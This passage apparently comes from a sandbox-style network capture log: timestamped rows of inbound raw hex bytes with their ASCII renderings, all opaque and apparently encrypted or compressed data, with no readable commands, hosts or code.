81 9b Data Ascii: ci-7,;VE$f`j&i(o$n!bkz \|(\|I#fZmR&buDAP3cbVEC0+{TPZ@%ynK1vMz"pve?t?a,CzyhMs'i7v361[cIhvvG(;P;+Wy
2021-10-13 07:59:22 UTC	430	IN	Data Raw: 3b 7d a9 2c 4b d2 bc db 37 a9 39 75 0b b8 26 6e 6c 0e 16 91 da be 41 b5 cd 6e 26 db 57 d0 24 75 42 05 1c b6 f6 16 d2 43 9d 1b 39 45 2d 32 8a e5 20 26 45 6e 3c aa 6d 32 08 5a 8b 40 f9 f2 d6 0f 3c 74 07 a5 c5 29 19 99 52 5c f6 7d ff 2d 2c 93 3b 24 6c ea c8 ea d8 ac 3c 7f 1a ad 37 b9 02 1a ff 39 11 dd 32 cf 24 13 5d 67 ca b1 b2 b4 a4 37 98 80 c9 81 ed 39 5d a2 a3 f6 02 45 90 fe 06 04 cd 8c 3c ad b5 08 d6 07 4b fd 2e cc 2b 40 a8 d1 f2 51 2e cb 1d 0a 5f 3c c0 ea 4a 12 bc 24 c0 a9 e6 49 da 64 c9 4a 7d 82 49 2d 45 14 b2 07 b3 c6 29 65 42 31 4f 44 69 1b 00 9e ec 6f 94 01 9b 9c 24 0f 11 e4 a1 39 41 52 b4 57 75 2a bf df 53 b2 a2 26 20 3c cb 76 8c 55 04 1e d6 65 04 cf 13 4c 65 3c bf 78 4b 06 39 c2 b2 c9 6f 28 8c b7 77 7e 98 1c a3 0b 40 5d 9d 97 09 51 56 81 8c 26 c0 Data Ascii: ;},K79u&nlAn&W$uBC9E-2 &En<m2Z@<t)R\}-,;$l<792$]g79]E<K.+@Q._<J$IdJ}I-E)eB1ODio$9ARWu*S& <vUeLe<xK9o(w~@]QV&
2021-10-13 07:59:22 UTC	438	IN	Data Raw: 0f 69 91 96 39 30 56 aa 39 d4 5a b8 07 06 87 f6 41 b8 9d b6 7c 1a 29 bb 1e a5 9f 74 cf 6f 70 66 d2 c6 b1 f3 cf 3c 56 31 dd df 58 b1 6e 24 ed 41 9f 2c 79 94 07 12 24 dc a8 23 45 96 e3 93 c2 46 32 10 79 84 d3 04 1c bb 92 76 b6 65 d5 90 37 01 29 aa 71 eb 44 40 25 e4 ea 24 39 5d 8d dc 37 b7 86 3e 25 83 ab 06 28 b5 0a c7 fe ea cb 8a d0 b2 7b 9a 98 49 31 b0 2c 0e d4 f2 84 05 d2 52 24 02 89 80 0c 6c 02 fe c9 2c 21 c9 5e 43 c4 9e 19 90 a2 07 a0 35 43 72 2e 9a 49 14 d9 e7 d7 db 56 1f 56 88 46 95 15 2a 8f e4 24 5e 81 b4 97 1c b7 d7 55 e0 1c 1c b8 31 71 bb a5 c0 f3 ba 8a 9a fe 71 62 52 58 97 33 e7 39 be 91 3b f6 a7 97 8d 07 00 f1 29 6d c0 ee e3 7d 40 f3 bb 6c 95 2e 77 f0 33 bd 41 0d fb 04 c0 30 5e 59 2c 39 93 06 0d 09 77 ea 1e 31 3b 17 7a 80 3a 30 97 5a 6b db 4f 59 Data Ascii: i90V9ZA\|)topf<V1Xn$A,y$#EF2yve7)qD@%$9]7>%({I1,R$l,!^C5Cr.IVVF*$^U1qqbRX39;)m}@l.w3A0^Y,9w1;z:0ZkOY
2021-10-13 07:59:22 UTC	445	IN	Data Raw: a8 c6 e3 e1 4b 11 8a fb 06 03 d1 56 72 08 8c 94 6e c0 91 1a a5 69 76 7a ed ff d5 5f dd a4 df 75 20 54 84 dc 28 3d 34 e7 b6 30 a3 6c f6 9d 17 09 7a 6e 07 7b 13 5a 2e 1d de 05 11 38 88 bf 62 74 09 18 d1 1f 40 30 9e d7 3f 52 77 fb 3b 6c 40 36 cc 4e 0a 0c d8 9c 01 2c bc bb de 8a 95 39 90 be f4 12 22 8b 18 10 ef 12 7e 85 af a3 f6 d9 8e ff af 66 5f 8b 39 21 a9 50 4d 8d e9 a5 2f b0 21 98 c2 92 e2 4c cc 27 94 bd 4b 29 17 59 c0 50 79 f8 c8 dd 78 24 10 6d 1c 30 25 ff 2e 01 14 9b 95 3f 09 33 c6 ed 04 d4 36 2b aa 13 97 5a 8b 4e 91 1a a8 41 51 20 38 c2 11 37 1a 3a 6a 98 20 02 35 18 93 28 69 18 97 da 41 36 59 93 55 d1 ac df 59 4e 71 54 d3 3b 4b 54 a9 12 9e 3c 4f bc 8e 91 6f 01 ac 49 41 52 93 16 8f d0 b4 9c e6 47 11 39 cc e2 c8 b8 46 80 5d 25 4a 38 d6 23 1c 29 b0 ed 2d Data Ascii: KVrnivz_u T(=40lzn{Z.8bt@0?Rw;l@6N,9"~f_9!PM/!L'K)YPyx$m0%.?36+ZNAQ 87:j 5(iA6YUYNqT;KT<OoIARG9F]%J8#)-
2021-10-13 07:59:22 UTC	453	IN	Data Raw: 23 9c 1e d0 2c c3 49 60 b0 8d 2e 8c a0 90 68 d3 b9 93 b4 53 97 45 58 f7 69 a7 d5 28 ed 1f 4a 5f 20 04 07 d8 a9 29 51 d6 74 5b f0 a5 a6 cb 24 d2 e9 22 ae bc 1d 13 10 c0 89 18 d8 6c 17 a7 ba 5c 34 3a 80 b8 8d b0 b8 bb c8 41 67 66 80 7a b6 69 99 4c b2 26 a7 59 4f ef 6e 8a c5 21 d2 32 f0 40 66 89 11 f0 a8 6b d2 8c 2a 79 1e 64 70 1e be df fe 28 4c 11 7d 48 df 13 c8 76 67 9b 89 43 19 c3 29 94 4a 9d b6 2a ca fb f3 34 2d 85 b0 13 84 db b1 13 83 2f c7 1a e9 be f2 f1 f3 70 36 f6 b8 40 4b 24 e6 9f 54 39 a0 86 13 17 f8 8f b3 77 c7 02 6b 03 2c a5 8c d0 d5 6f 59 52 41 bd 59 49 4e 57 a5 08 a9 8a 87 09 58 26 2e dc d1 82 1e 9b 7a c2 2a 9c 27 be 0e e2 15 e6 71 72 c9 c5 74 4b b8 01 33 fa 13 61 9a ce 30 93 c5 c1 bb d4 be 99 25 be 15 76 f1 17 c1 3a ef 18 9c 42 32 c8 d7 00 dc Data Ascii: #,I`.hSEXi(J_ )Qt[$"l\4:AgfziL&YOn!2@fkydp(L}HvgC)J4-/p6@K$T9wk,oYRAYINWX&.z*'qrtK3a0%v:B2
2021-10-13 07:59:22 UTC	461	IN	Data Raw: 85 dc 25 bc f2 b5 b9 4d ea a7 28 f8 95 38 90 95 de e2 3d 33 1e a5 2e 16 e2 e1 6a a2 ee da 86 07 20 09 a9 31 7a cc c6 bd ef 4a 39 1b c9 70 9f f3 5d b4 9b c4 39 0a 80 03 d8 58 16 b9 d9 82 8d a2 7d 31 6c 60 73 36 18 b5 47 0b 9a 05 81 74 97 ff ba 48 e0 b5 2d 97 b3 3e 3b 38 16 b9 c6 51 3a 4e 9b 97 dd a1 2d 09 1a 34 64 c2 78 72 db 6b 31 9a 3d 1d 27 6b e9 b3 15 bd 5c 10 a3 26 1a d7 f2 4e 0b de 98 f9 81 1a 06 f2 c5 78 32 ac d6 81 83 b5 47 f6 04 c0 33 c6 e4 03 e6 e8 21 c4 84 c0 26 e9 4e 2c 01 9d ca dd 23 b0 0f 1d ba bf 9f 16 29 bf 7f 79 86 75 8d a7 f6 17 84 70 52 be 58 b6 6c 83 35 1e b3 0f 68 c3 a9 2a 44 5d 92 a7 30 8b 8a dd eb 05 41 c0 2f ac 30 46 6b ca 9a 6e 89 c4 9f 45 67 23 b6 3a 39 0b 74 1a e1 9b 41 ab 25 52 78 36 fb 39 c6 74 04 60 75 fc 2b 31 6c 0c 84 ea 11 Data Ascii: %M(8=3.j 1zJ9p]9X}1l`s6GtH->;8Q:N-4dxrk1='k\&Nx2G3!&N,#)yupRXl5h*D]0A/0FknEg#:9tA%Rx69t`u+1l
2021-10-13 07:59:22 UTC	469	IN	Data Raw: 08 c7 b8 78 be d4 a7 49 70 59 c6 3f fa 85 e7 eb a1 5e 7c f1 cb 69 6d 35 3a 7b 72 ce 84 c4 77 9a c9 39 d0 4f 09 74 d5 d1 6a 46 91 2a ea ab be 52 24 81 f4 f8 f5 f2 29 8f 58 4e 44 68 46 7b 5c 52 a0 08 58 a8 a8 13 05 7b ef 8d 90 f1 2e d5 67 f0 cf 90 b4 14 95 86 ab f3 c3 13 87 58 27 58 b1 03 b5 77 cd f4 24 99 1c 12 bd de c7 43 d6 bf 04 8f ca af 37 06 4d 7b fe a5 e9 5c 34 21 bd 47 b8 3a 9c b8 65 ac 4a 90 36 61 f5 8a d2 41 b0 16 9d 58 4c c8 1a 01 26 43 54 14 4f cf 70 14 68 39 61 2d fd 0e c6 ce 7b 53 9b cd aa 55 ad 30 94 d4 42 ac aa 9c 11 b3 ce 04 82 38 7f 28 26 36 24 ac 7d a0 2f ab 54 de d6 e8 af dd a0 20 e7 4c 88 e5 da 0d 11 8a 20 0f 8e 42 b4 50 fb 04 20 10 ab 50 b9 d1 b1 24 a9 5e 93 5a b3 69 16 e6 45 bb b6 89 51 3a 39 be 6a 07 f0 4c 9b de 81 b3 e3 19 9c 72 31 Data Ascii: xIpY?^\|im5:{rw9OtjF*R$)XNDhF{\RX{.gX'Xw$C7M{\4!G:eJ6aAXL&CTOph9a-{SU0B8(&6$}/T L BP P$^ZiEQ:9jLr1
2021-10-13 07:59:22 UTC	477	IN	Data Raw: d0 16 87 78 64 2d c0 a6 a0 d4 c3 7e a1 70 d4 a7 27 22 a1 07 09 6b d6 06 6c 86 99 68 e6 83 b9 84 23 74 a4 dd 13 6e bb 23 49 ae e4 60 c0 1a fd 97 d1 a2 cf 56 79 54 1a 09 78 dc 50 d0 e5 10 4b 50 b6 bb ae ad 11 b3 42 00 21 95 de 02 f1 52 54 81 be fb cd ab 6e 18 ba 51 f3 70 d6 7c 47 e0 82 55 81 41 69 79 78 d0 b9 7d 2f 25 ce 33 42 bd 58 b7 cf 02 c2 72 ad f4 92 c4 37 64 5a 14 29 a0 cc a6 90 60 d1 ce df 3d 5d 6a 96 75 08 62 24 91 be d2 5b f4 e6 e6 a9 2a f7 8d 26 07 53 3b df 10 ce 36 86 19 29 05 e6 6f 23 81 95 7f 8f 8d a2 1f be 61 a7 a8 af d5 be 3e d7 38 b0 92 3b 81 2b 1c 3c d6 f6 0f ba fb 24 0f 77 e3 12 7a e2 dd ad 9d 4a dc 0c 21 7d 18 b1 89 42 2b 18 5e 0f ea e0 be 1c 38 b0 46 99 79 7d c9 67 da 08 5f cd 5a a1 96 40 97 a0 5c 18 85 66 64 0f a4 06 ce 6c 61 8c a8 26 Data Ascii: xd-~p'"klh#tn#I`VyTxPKPB!RTnQp\|GUAiyx}/%3BXr7dZ)`=]jub$[*&S;6)o#a>8;+<$wzJ!}B+^8Fy}g_Z@\fdla&
2021-10-13 07:59:22 UTC	484	IN	Data Raw: e0 fe de 54 4c eb 6d e3 36 27 7b 9a 59 e7 39 71 73 6f 76 ad 43 4a b2 02 eb 80 e5 d0 3b 6e 93 08 7c 68 19 14 2a 85 d4 62 0e a3 a7 a9 71 b7 92 27 6e 7b 70 ce a7 84 fc 9f 26 69 e4 57 9b 92 2d bf 30 b0 15 cc 6e f7 4e bb 00 0a 1d 01 76 95 7c 01 8e 36 5d 25 98 59 2b 4f 27 88 50 50 12 05 62 7b e1 85 b0 47 bf 33 8e 4c 95 4f 4f 48 fa 14 18 b3 f2 35 84 35 2d 23 fe 25 c1 ff 3c 2a 08 99 f0 3d be 14 da 58 8a 3c a1 16 c7 24 fc ef 04 48 17 3f 1d b9 7c 38 13 6d 99 17 11 88 f9 61 1d 20 eb 60 08 a6 7b 96 b2 50 ca 5d 06 18 30 1b bc 50 fc a3 61 ab 49 ba 50 5a 3f 2c cd 25 a0 ce 4d 92 6c ab 05 02 72 15 d9 15 88 77 7c 87 fd 7b 4e 7a c6 32 a0 b0 3f 36 61 08 8d 07 f5 9b c2 8c 00 47 56 38 ad 6d cc 51 df c7 df 39 65 0a 4c 0a 0b 45 1e 0e 92 b2 4d bf 67 31 e0 91 96 c5 2a e9 34 0d 91 Data Ascii: TLm6'{Y9qsovCJ;n\|hbq'n{p&iW-0nNv\|6]%Y+O'PPb{G3LOOH55-#%<=X<$H?\|8ma `{P]0PaIPZ?,%Mlrw\|{Nz2?6aGV8mQ9eLEMg1*4
2021-10-13 07:59:22 UTC	492	IN	Data Raw: 19 b2 4a 5e ee 22 b9 32 ef cf bc 67 27 8c 9e 64 1b ec 8c 47 f2 c0 58 84 d1 c6 0a f6 72 78 b2 24 c6 ae 83 2d 66 a4 3a 56 57 86 7f 70 42 5b 78 44 6d a2 85 49 73 83 6e a2 bf 60 46 1c 3d fa a2 f0 fa 41 d7 b7 5a 95 f4 90 69 53 47 64 f5 17 b5 a9 96 e1 ef 4f 2e 50 c6 3e 75 4d 5c 12 80 3b 2a 83 96 c4 d1 b8 71 85 a6 2c 83 a0 b9 3b 71 34 7c d0 6c 98 d0 62 78 09 4c 2e 15 a3 ee f4 95 9b c4 f7 0a 1f 15 25 ad 46 42 86 ac 71 70 87 87 09 bb 7c 24 42 ce c0 36 2c 19 fd 3b 3e 15 c3 09 23 3f 1d a7 bd 9c 6e 0e 4d 19 c5 86 88 2e b8 a6 0b 65 25 bc 84 e0 37 e2 df e6 fb 5d 61 62 57 92 73 ae d1 eb f6 9f 01 ed 68 4a c6 d5 8e 72 ef 69 13 7a 06 61 32 b7 07 19 ce 14 3c 5e 4f b6 4f 6f 90 85 34 d7 16 1f a5 15 40 dc f9 4a 95 88 5b b6 0b 15 00 82 c1 40 28 05 52 62 81 54 40 3a 5c d3 d1 3f Data Ascii: J^"2g'dGXrx$-f:VWpB[xDmIsn`F=AZiSGdO.P>uM\;*q,;q4\|lbxL.%FBqp\|$B6,;>#?nM.e%7]abWshJriza2<^OOo4@J[@(RbT@:\?
2021-10-13 07:59:22 UTC	500	IN	Data Raw: c4 b7 1b 2b 7a 62 c2 af 5a 03 f1 6c 3b 3b 7c 90 54 cc 47 1a d6 b1 f5 1d 7a 50 46 78 4b 44 9d 4b 12 5c f7 64 3e 5c 00 f0 a3 a9 c4 66 8e 85 3d 49 e6 9c ce ad 7a 41 fa 92 7d e8 e2 df 5d b0 be e7 f6 0b 98 08 03 c0 f2 0d f3 17 80 91 0b af a6 79 f8 43 7a a4 45 6e 80 63 93 8e 1b cf 61 74 44 79 b3 fd 05 af cb d7 aa ff a5 5a 50 d7 a3 b4 a9 95 49 ef 93 b3 04 7a 71 29 17 97 59 a0 e2 cf dd 34 26 98 17 bd 6d dc 72 ca 46 19 d0 32 f6 1d 7c eb 90 4c 98 f8 e0 7e 5e 2f 9d 8d 20 a8 e5 eb a4 a0 a5 7e 54 5f 97 d4 b6 42 84 4a 8d 57 44 45 5e 09 b9 42 1b 59 30 26 ec a9 2b 38 d3 3e b3 a4 61 ab e2 94 37 a2 ac a2 f7 8d 2d 05 78 8c 84 e1 6b 27 43 1d e7 22 ab af 2e 3c 06 f2 37 eb 2d 65 ed 01 79 f2 9b c2 ac 36 03 6f af d4 6d c3 a7 04 61 7f a2 69 ab 66 fe 24 e4 8e ab cb c0 f9 21 63 65 Data Ascii: +zbZl;;\|TGzPFxKDK\d>\f=IzA}]yCzEncatDyZPIzq)Y4&mrF2\|L~^/ ~T_BJWDE^BY0&+8>a7-xk'C".<7-ey6omaif$!ce
2021-10-13 07:59:22 UTC	508	IN	Data Raw: ef d6 23 92 92 2c 62 e0 9a ce 1c 6e ac 50 0b 9a 0b a3 a3 98 d6 df e0 85 4e 37 6d 62 e5 f1 1a 3d a8 97 c2 8c 99 1d 6b ac 3d 49 d0 12 c3 ed 65 bf d9 b8 c4 dd 55 1f 85 56 43 03 21 9e c4 28 96 33 c8 d2 f9 95 19 38 8f 06 bb 1b cb 8d df 1a 1e ac a6 32 c5 99 db 20 5a 49 37 1c dd 50 f6 2b ee 8c 4e f8 a0 2c d1 ab 26 bd 80 b2 83 a3 9e 5e 0d 4b 86 cc 69 92 b4 ba de 29 21 fb e2 aa b4 7a b5 a7 a8 c7 cd c4 88 28 0a 5c 2e 50 ca 65 2d da 26 ce 7d 9b b3 7c ea 93 7a e8 78 71 01 0a 1c b6 8a 8e 6e 7f 4a e5 ad 34 7d e3 8f f6 88 ee 5f 87 f0 c1 3a 68 92 e0 9b 4a ff 78 c7 fd 7b dd db a7 ac dd e5 b6 33 d1 bd b0 ad 45 a8 bf f1 98 86 ec 81 ea fe c1 f2 8d 1d 17 36 f2 6f 74 f2 33 83 fe 29 fc a7 0c 59 07 97 e0 cc 10 0e 71 87 ec cd db ae d6 30 01 2b b6 b6 9a 44 95 43 2f db 95 47 f7 79 Data Ascii: #,bnPN7mb=k=IeUVC!(382 ZI7P+N,&^Ki)!z(\.Pe-&}\|zxqnJ4}_:hJx{3E6ot3)Yq0+DC/Gy
2021-10-13 07:59:22 UTC	516	IN	Data Raw: c4 83 0c df 1e f0 67 79 ed f8 89 a1 38 e9 a0 fd de 28 c3 0d 98 26 fb 0f 2f 0e ee be cb 9a af 4e c5 7b 79 7b b7 29 9c bd b6 65 ed 9e bc 7b b7 4a f9 e6 e7 d9 bd 76 eb ac cb d8 81 82 35 3e 81 6e a8 93 ee 28 ee ba 78 71 39 17 4b 0f 44 c0 54 3f d6 11 e3 ea 5d 56 5d 67 de 59 f0 b7 c0 aa ee ea 69 8d eb 19 4e 98 e1 07 95 80 03 6f 79 cb ce c8 36 b1 9e 7f dd 99 0f 34 c9 72 18 ce 7e 70 b8 64 94 52 be 98 52 36 85 bc 70 a1 e2 3e e3 72 94 80 2e 40 50 39 0d 70 0d ca 87 fd 4d 8a a5 3a 99 d6 67 36 a6 22 d6 52 ec 53 95 63 d2 f5 6e 7e b1 bf 6c de af e0 28 b6 62 c1 56 7b 92 82 47 09 92 1f d0 b0 5a 36 bb 1a 2f bd cb 5e 06 c3 5f e1 9f ed 53 8a a4 97 87 09 79 ee 7c 04 83 70 ca 40 ce f5 4f 1f 35 e7 6e 09 b5 b4 28 f8 1c 0c 2a 0a 0e 83 67 c5 0f 7c df 51 d3 5c ce 9c 6b 49 8c de af Data Ascii: gy8(&/N{y{)e{Jv5>n(xq9KDT?]V]gYiNoy64r~pdRR6p>r.@P9pM:g6"RScn~l(bV{GZ6/^_Sy\|p@O5n(*g\|Q\kI
2021-10-13 07:59:22 UTC	523	IN	Data Raw: 4b 64 03 08 13 2d d1 3c 63 b7 a1 d0 0c 3f a2 27 90 11 8b 4a b6 3c 1e c6 39 83 67 33 67 60 8b 2b 27 07 59 dd 96 f6 49 f6 88 49 87 6b 23 af 5d d6 b4 86 24 cd 92 82 24 3c 78 ca 0d d9 17 16 f7 16 51 18 be c1 45 49 76 c9 19 19 a2 2b e7 c4 1d cd 52 25 fd 9e 44 ea 85 5f ae 67 2f a7 b8 63 0b 72 49 5f 87 92 1d 15 3e 36 08 f3 b9 ea bd d9 39 12 45 04 0d f7 96 c7 17 d0 ee 8a bc 2e 97 a0 16 65 aa 3c fb d3 1b 6b f8 b0 20 f9 5a cc 1f 4a 86 64 d6 29 47 a7 90 31 c7 96 99 da ce 66 6e 48 78 2b 84 3b 48 1f d9 72 09 72 b9 d0 77 b6 18 78 ff c1 7d 04 5a 6b a3 9b 18 7a 8c 18 10 71 7d fc 59 fb db 00 5f 62 f4 14 2d 52 d6 2e 06 c3 12 34 d8 88 ea c8 34 d9 2a d6 c8 05 5f d6 5d ed d7 61 79 51 86 d9 21 6b ef f2 cd b7 f2 48 8f fa c3 f8 7f ce b1 6e e0 27 f7 23 9b c1 74 b3 0e cc 16 8d 45 Data Ascii: Kd-<c?'J<9g3g`+'YIIk#]$$<xQEIv+R%D_g/crI_>69E.e<k ZJd)G1fnHx+;Hrrwx}Zkzq}Y_b-R.44*_]ayQ!kHn'#tE
2021-10-13 07:59:22 UTC	531	IN	Data Raw: 45 91 cb 5a 5f 4e de ff f5 5e 51 26 66 ee 72 fc e4 ef 1b 38 ba 4e 94 c9 78 36 d5 aa e8 f5 cf 53 30 4e e5 83 5d a7 6d 3c d8 28 3a bb 42 9d 64 bb 47 31 5e 85 e2 a3 90 1a 96 3f c1 79 6b 99 4d e6 be b1 37 cb fb ec 9e 35 26 0e 02 f9 d0 80 97 58 a6 ef c5 6b 52 48 6a 75 c3 fa 83 33 ce 45 35 45 8a 95 3f ca 1f bf 37 6f 14 cb b8 d4 96 65 63 85 d5 61 56 f3 19 80 d2 4f 0b bd c0 74 70 19 29 4b 88 bf 8c dd 4d bd 37 96 f1 0f ed f0 dc 69 79 4d 9f 46 69 dc dd 73 53 ea 9c 75 91 b8 c9 33 04 50 fb f1 3b 93 6e 0e f4 4e 73 25 4b 6a a7 74 a4 5a bf 1d 69 e0 61 77 61 99 a5 ab dd 5d 57 e2 bd 67 c1 ca e9 5b 32 58 e5 af 67 0f 7e 67 fa 55 31 fe 25 ee 74 40 03 11 e9 58 12 ab b7 47 d8 8f 34 3c e2 05 52 3f 1c f4 05 88 3f 9b a5 71 7e 71 d2 ab 5b 8d c6 6b 2d 54 e9 1c 89 4a ae cf 14 a4 8d Data Ascii: EZ_N^Q&fr8Nx6S0N]m<(:BdG1^?ykM75&XkRHju3E5E?7oecaVOtp)KM7iyMFisSu3P;nNs%KjtZiawa]Wg[2Xg~gU1%t@XG4<R??q~q[k-TJ
2021-10-13 07:59:22 UTC	539	IN	Data Raw: dd 2b bd c6 be 1d 9c 03 2f f4 ca a2 c4 24 40 10 49 78 e0 cf 87 72 96 96 fa 7c 66 5b 1e bc 18 c2 64 02 40 6c 3b 98 5c 09 80 60 35 d0 e9 00 72 22 a1 50 d3 49 f2 21 bb 0a 51 85 de 7c 73 21 4e f0 ac cf 4e 7c 97 13 5a a2 76 df 3d 36 75 bc fa 39 f6 5f b5 4e 54 84 ed 93 b1 03 1c ba 5a f0 8f 15 7e 45 4b 57 b2 15 bf 66 d7 e8 f4 13 bb 71 88 2f 9c 4e 77 20 fe 20 ec 66 4c c1 2b b1 ab 62 5e ab 72 49 b5 b0 95 ed cd f2 61 8f 58 7d 00 cc 66 3b ce f2 2d bf 88 0f 2e 94 03 17 3e fb da 9e 47 35 d4 98 25 1b 36 7d ab f8 1c 38 78 7c db 3b d7 2e 8e bb 0a 46 d0 fc 8f 9c 9a 9a bd 19 4c 1a 38 3f de c7 9c ca 81 30 ee 5d 04 b8 82 1c 6d e3 de e3 bf 1e bd eb 18 f5 0e 98 f1 53 08 ac 0c 27 da 00 94 4a 40 33 42 2c 5a 91 6c a8 b5 c3 8f 21 2f de da 39 5b 65 d7 8f 8f 3c 96 16 b1 23 f6 e6 b8 Data Ascii: +/$@Ixr\|f[d@l;\`5r"PI!Q\|s!NN\|Zv=6u9_NTZ~EKWfq/Nw fL+b^rIaX}f;-.>G5%6}8x\|;.FL8?0]mS'J@3B,Zl!/9[e<#
2021-10-13 07:59:22 UTC	547	IN	Data Raw: 04 64 5d fd 90 05 43 03 e0 14 06 10 5d 7d 2b 29 a3 93 dc ec 19 9a 5a a4 54 7d 1c be e2 a5 77 73 d4 c6 3d 7d 88 7b 51 78 d0 aa 73 5f dc 7d 59 9d 19 50 b8 c0 3b db a0 cf ec 27 56 c1 0c 51 71 b9 ea c6 ab af 4c 7d ed a3 a7 c7 fb 2a 9e b9 44 72 54 aa 8e 03 84 8e 23 a4 3a 8d 08 d8 6f 24 e1 1d 8f 6d b3 c3 c3 32 6b 81 43 2b 22 ab 38 d2 33 a8 c8 9c 5a 1c 9a 48 8d 90 82 11 b6 e7 51 4f 81 69 18 9d 23 03 bd 7c 14 50 c0 07 08 06 87 0a 9c 81 2c c4 f8 89 ff c6 13 45 2b ef 31 39 e1 fa fc 4e 3c 7d 5c ed 04 87 e7 c6 67 9c a2 53 2d a5 25 d1 a2 b4 1c 3a 27 0e 3c 4f cf 5f d4 e3 c3 f7 d3 ae bf 31 79 a6 e2 ed f9 5a 4d 93 75 a6 b6 26 95 48 a6 34 ab fe ad fc 0e b0 19 68 45 13 fd a9 de ee 25 7e 94 0a bf 42 99 fe 1b 67 a6 d5 e6 67 3a 40 1a 3b 65 90 98 8d 4a 9c 4b 7a 2e de 70 46 66 Data Ascii: d]C]}+)ZT}ws=}{Qxs_}YP;'VQqL}*DrT#:o$m2kC+"83ZHQOi#\|P,E+19N<}\gS-%:'<O_1yZMu&H4hE%~Bgg:@;eJKz.pFf
2021-10-13 07:59:22 UTC	555	IN	Data Raw: 6a 15 59 18 b7 0d 92 45 22 cd 19 1d cf f1 f0 cc e5 ee 75 d3 4d bb cb f5 1c 9a 25 83 fa f6 d2 68 2c 27 a1 61 cc e9 bc 96 f6 b2 e9 fd cb 3e 0f 94 ee 5e 79 fd 8f a9 79 df 0a 5b 29 49 a8 cb d3 d1 c1 ea 8d 2a c0 b3 59 44 18 5f 10 26 9c 74 3d 5e 52 32 ee f2 4a f1 fe 17 86 39 d6 3f ec ac fe e2 a5 17 9f ae 73 78 d2 e9 7c 6b 00 17 a9 85 a9 10 62 12 07 e0 93 30 21 32 78 67 e7 09 fa be 21 0c 7f 05 37 b0 73 ab 84 e5 e6 53 10 8c 0b 54 07 81 4c 20 e8 4e d7 40 aa f0 1d a8 05 db 12 a5 e4 42 e8 ae 0e 58 61 30 50 e2 ea d9 01 62 1f 43 38 0d aa 54 11 8f ae c1 5a 34 3e 66 1b 9d ba 2f 34 12 eb b4 fa 76 36 7d be fd 9f 0f 4a 34 cd 2f 5d 9e 2e 33 ed 44 8c c9 7d d5 1b c9 19 b8 69 39 65 f8 2a d7 b7 0e 7f 1f 52 0f 47 8e 3b fc d2 0d c9 c2 51 3a 7f 2b 63 2f 18 ef af d2 75 a4 73 12 f5 Data Ascii: jYE"uM%h,'a>^yy[)IYD_&t=^R2J9?sx\|kb0!2xg!7sSTL N@BXa0PbC8TZ4>f/4v6}J4/].3D}i9eRG;Q:+c/us
2021-10-13 07:59:22 UTC	563	IN	Data Raw: 78 57 fb 2f 25 cf 7c cd 28 38 4a df 8f 9d d9 4d da 06 c6 2f 8c 5b b1 b4 6b 52 de 15 31 f9 af 4d 47 09 9a bf bc d5 21 36 a4 c2 79 1c 47 79 43 2b ab ca 2d b7 42 49 29 3c cc 68 ea 3a e1 92 ba 1c e0 3d 98 fe 79 5f 7d ed 84 ae d6 07 de c4 af 12 ad 2f d7 60 da 39 60 9a 32 95 71 d9 c7 3f c7 4b 4f 29 aa ad 5c c7 7d 38 eb 4c c9 eb fd 62 2b ef 78 bb 76 ee 29 6f ab 7d 59 4a ac e2 9c 36 4d e4 6f f6 41 4b c6 9f d8 ff 6a 05 82 01 08 2c c2 44 00 a7 40 8f 64 10 19 39 05 08 44 f5 a9 80 55 0f dc ee 09 a2 00 8a 3c b4 0f 9d b8 28 2e 7f 0e b9 09 fa b0 2d 49 9b 48 84 cd c4 1c 57 e0 00 46 05 ca ff 60 8d a1 43 1d 3e a3 ca ff 06 a9 92 88 94 71 50 b6 10 52 65 2e ec f9 a4 eb 46 28 8b 84 74 51 2c 77 6d de 68 a2 49 02 69 0d f7 8c 66 4f 8a 49 3d 96 f1 fd 21 6b 7f 83 9c 87 d8 e4 ae 91 Data Ascii: xW/%\|(8JM/[kR1MG!6yGyC+-BI)<h:=y_}/`9`2q?KO)\}8Lb+xv)o}YJ6MoAKj,D@d9DU<(.-IHWF`C>qPRe.F(tQ,wmhIifOI=!k
2021-10-13 07:59:22 UTC	570	IN	Data Raw: ff a3 cd 0d 9d 04 0e 28 1b 0a f8 2f 1c 20 42 ff 25 e0 0f 3c e6 12 9a 03 a8 0d b1 af f6 82 00 01 c7 82 dc e1 5f 4d 77 0b 14 81 e3 6d 62 e2 02 6c 0a c4 b3 3c 04 d7 90 80 2a 48 b9 08 07 78 b6 2f 6a 9c 0c 08 4f fa 6f 1b f1 0f 81 8e 70 f4 5a 87 c7 2e 34 58 e3 bf 16 05 a3 19 5a 09 7f 01 89 2c 61 c9 00 65 52 e8 2c 21 a9 35 fd 42 74 13 c0 04 48 6a 67 de 9a b6 be a9 6c 3f 26 84 ab 96 34 f7 f7 5d 2f d6 96 93 dc 4c 1f ea 94 39 79 99 b2 f1 0c a5 9e 7b 72 08 7f 0a 0e 2e f9 71 9e 2e f1 e4 45 ff 76 e2 97 a3 58 78 a5 f2 aa b6 34 2a 93 f7 0e 43 c7 78 0f 51 b6 23 48 f7 11 56 b9 74 d2 26 d4 a9 b5 37 4b 0a 68 6e 4d bd a7 e7 96 6d 9b f1 2c f7 a3 39 be f9 3b 14 8b 49 9d af 86 9b b0 27 3d f8 93 78 37 90 28 92 74 97 5c 97 b8 49 df 4c 55 8f 68 fa d9 db 21 29 3d e2 fc 88 ec a6 ab Data Ascii: (/ B%<_Mwmbl<Hx/jOopZ.4XZ,aeR,!5BtHjgl?&4]/L9y{r.q.EvXx4CxQ#HVt&7KhnMm,9;I'=x7(t\ILUh!)=
2021-10-13 07:59:22 UTC	578	IN	Data Raw: 8c 63 2d 1a 9d 91 39 20 83 5d 28 a2 f4 a3 22 fb 7c 1f 88 b9 a9 b0 fc b7 8b 6f a3 77 29 08 0e b6 fd 0b 1a 82 93 54 0e 9b 8b ca 00 d6 f4 04 e2 ae 71 f1 05 07 6b ee ef 37 e4 d2 db f3 c3 cf 54 ab db b7 f0 1d 3d b5 ff 92 ac cf 0a 4c d8 ce 5d f7 d6 4a 2d 6f a6 13 b6 32 df 93 c1 c8 82 86 9a 3a 84 d8 71 83 6b 5e 43 e8 47 ed 75 b9 71 57 b8 99 30 a9 9d 60 9f 0f 1c 19 c1 fa 77 c7 20 ad 00 41 c6 41 13 4b b0 5e e7 7e f2 43 09 10 c7 6a d2 ef 90 38 63 38 bf f4 fc e5 ee 6c 14 60 93 f1 71 15 12 5c 1b 12 2a 75 ef 06 c8 b9 8e 63 3b ba 74 0b 3b 89 68 9d 47 c2 e5 9b 03 d5 b9 26 24 75 5e 59 42 34 65 d7 e5 79 12 83 05 2a 